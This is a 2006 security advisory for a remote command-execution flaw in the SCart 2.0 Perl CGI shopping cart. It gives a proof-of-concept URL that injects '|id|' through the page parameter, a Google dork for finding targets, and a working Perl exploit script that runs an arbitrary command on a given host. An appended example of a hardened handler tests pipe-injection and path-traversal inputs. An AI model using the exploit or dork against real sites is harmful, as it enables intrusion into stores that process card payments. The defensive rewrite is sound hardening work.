echo.or.id                                              ECHO_ADV_32$2006
---------------------------------------------------------------------------
[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution
---------------------------------------------------------------------------

Author       : M.Hasran Addahroni a.k.a K-159
Date         : June 3rd, 2006
Location     : Indonesia, Bali
Web          : http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
Critical Lvl : Highly critical
Impact       : System access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : SCart
Version     : 2.0
URL         : http://www.scartserver.com
Description : SCart is a free online shopping cart / store service with
              e-commerce features and real-time credit card and check
              payment processing.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~

In scart.cgi the source code looks like this:

-----------------------scart.cgi-----------------------------
...
require 'scart.pl';
require '/home/scart/cgi-bin/2.0/scartserver.cgi';
...
--------------------------------------------------------------

and in scartserver.cgi, in the cgi-bin folder, the code looks like this:

---------------scartserver.cgi--------------------------------
...
$HTML{TAB2}      = "$baseurl$cgiurl/?action=show_page&base=base2.html&page=browse.txt";
$HTML{TAB3}      = "$baseurl$cgiurl/?action=show_page&base=base3.html&page=specials.txt";
$HTML{BUTTONBAR} = $buttonbar;
$HTML{VIEWCART}  = "$baseurl$cgiurl?action=viewcart";
$HTML{CHECKOUT}  = "$secureurl$cgiurl?action=checkout";
$HTML{TRACK}     = "$baseurl$cgiurl?action=show_track";
$HTML{HELP}      = "$baseurl$cgiurl/?action=show_page&base=base.html&page=help.txt";
...
--------------------------------------------------------------

The variables $baseurl and $cgiurl are not properly sanitized. This can be
used to execute arbitrary commands.

Proof Of Concept:
~~~~~~~~~~~~~~~~~

http://www.scartserver.com/2.0/[client_user_name]/scart.cgi/?action=show_page&base=base2.html&page=|id|

Solution:
~~~~~~~~~

No solution yet.

Notification:
~~~~~~~~~~~~

The vendor was contacted but did not respond.
---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ ping - my dearest wife, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------

Contact:
~~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~~~

#!/usr/bin/perl
##
# SCart 2.0 Remote Code Execution Exploit
# Bugs Found & code By K-159
#
## based on the advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
#
# echo.or.id (c) 2006
#
##
# usage:
# perl scart.pl host path "cmd"
#
# Google Dork : site:scartserver.com
#
# Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
#
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
#
use strict;
use warnings;
use LWP::Simple;   # provides get(); IO::Socket was imported but never used

sub Usage {
    print STDERR "\n ========================================================= \r\n";
    print STDERR " *SCart 2.0 Remote Code Execution Exploit* \r\n";
    print STDERR " Bugs Found by K-159 \r\n";
    print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
    print STDERR " Usage: $0 host path \"cmd\" \r\n";
    print STDERR "============================================================= \r\n";
    exit;
}

# Three arguments are required: host, path of the directory holding scart.cgi, command.
if (@ARGV < 3) {
    Usage();
}

my $host    = $ARGV[0];   # scalar element, not the one-element slice @ARGV[0]
my $path    = $ARGV[1];
my $command = $ARGV[2];

print "\n[+] Connecting to $host\n";

# The command is placed in the page parameter, as in the advisory's proof of concept.
my $result = get("http://$host$path/scart.cgi?action=show_page&base=base2.html&page=browse.txt|$command|");

if (defined $result) {
    print $result;
} else {
    print "Exploit Failed.\n";
}
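The advisory reports no fix, so the following is an added example of how a show_page handler in a Perl CGI can be hardened; it is not SCart code and not part of the original advisory. It assumes (the advisory does not show the call itself) that the original handler passed the page name to Perl's two-argument open(), which treats a value beginning or ending with "|" as a command to pipe from rather than a file to read; that assumption is the usual cause of a "page=|id|" pattern and is marked in the comments. The names show_page_safe, %ALLOWED_PAGE, %ALLOWED_BASE and $pagedir are hypothetical. The example covers the general class (any query parameter reaching open()), not only the page parameter.

```perl
#!/usr/bin/perl
# Added example (not SCart code): hardened show_page handler for a Perl CGI.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Reconstruction of the unsafe pattern (assumption; the advisory does not show
# the open() call). Kept as a comment so that this script never executes it:
#
#   my $page = $in{page};                 # taken straight from the query string
#   open(PAGE, "$pagedir/$page") or die;  # 2-arg open: "|cmd|" is a pipe, not a file
#

# Hardened version: exact allowlist + strict name check + 3-argument open.
my %ALLOWED_PAGE = map { $_ => 1 } qw(browse.txt specials.txt help.txt);
my %ALLOWED_BASE = map { $_ => 1 } qw(base.html base2.html base3.html);

# Returns (1, file contents) on success or (0, reason) when the request is refused.
sub show_page_safe {
    my ($pagedir, $base, $page) = @_;

    # 1. Only the pages the application actually serves are acceptable.
    return (0, "unknown base: $base") unless $ALLOWED_BASE{$base};
    return (0, "unknown page: $page") unless $ALLOWED_PAGE{$page};

    # 2. Defence in depth: a single path component with no separators, pipes
    #    or shell metacharacters, even if the allowlist above is later loosened.
    return (0, "bad characters in page")
        unless $page =~ /\A[A-Za-z0-9_-]+\.(?:txt|html)\z/;

    # 3. Three-argument open with an explicit read mode: the filename is never
    #    interpreted as a pipe or as a mode prefix, whatever characters it holds.
    my $path = File::Spec->catfile($pagedir, $page);
    open(my $fh, '<', $path) or return (0, "cannot open $page: $!");
    local $/;                      # slurp mode for the duration of this sub
    my $body = <$fh>;
    close $fh;
    return (1, $body);
}

# Constructed demo: a temporary directory stands in for the real page directory,
# holding only browse.txt, so specials.txt is allowed but absent.
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', File::Spec->catfile($dir, 'browse.txt')) or die $!;
print {$out} "<p>catalogue</p>\n";
close $out;

# The third and fourth inputs mirror the shapes an attacker would send (pipe
# injection and path traversal); both are refused before any file is touched.
for my $page ('browse.txt', 'specials.txt', '|id|', 'browse.txt|id|', '../../../etc/passwd') {
    my ($ok, $msg) = show_page_safe($dir, 'base2.html', $page);
    printf "%-22s -> %s\n", $page,
        $ok ? 'served ' . length($msg) . ' bytes' : "rejected ($msg)";
}
```

Running the script prints one line per input: browse.txt is served, specials.txt is rejected by the open() failure (allowed name, no file), and the three hostile values are rejected by the allowlist before any filesystem or process access occurs. The allowlist is the real control; the regex and the three-argument open are there so that a future change to the allowlist cannot quietly reintroduce the pipe behaviour.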